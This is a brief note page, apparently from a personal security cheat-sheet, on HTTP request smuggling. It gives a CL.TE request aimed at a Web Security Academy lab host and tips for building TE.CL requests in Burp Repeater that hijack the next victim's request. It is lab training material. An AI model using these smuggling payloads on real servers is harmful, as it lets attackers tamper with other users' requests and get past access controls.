HTTP Request Smuggling
Bypass, XSS and more
CL.TE
POST / HTTP/1.1
Host: 0aa9006c0356f4eac12f806b00d70072.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked
0
GET /404 HTTP/1.1
X-Ignore: x
Note: Content Length is auto-computed by Burp (in orange)
TE.CL

Spot two enters on line 16 to end chunked request. Disable content Length computation in Burp Repeater settings.
The first Content-Length has 4bytes just to express chunked size (on line 7, chunked bytes are computed from the orange part).
The second Content-Length which is slightly above, what is required from its data, to override next coming victim's request.
TE.0 PoC
Last updated
Was this helpful?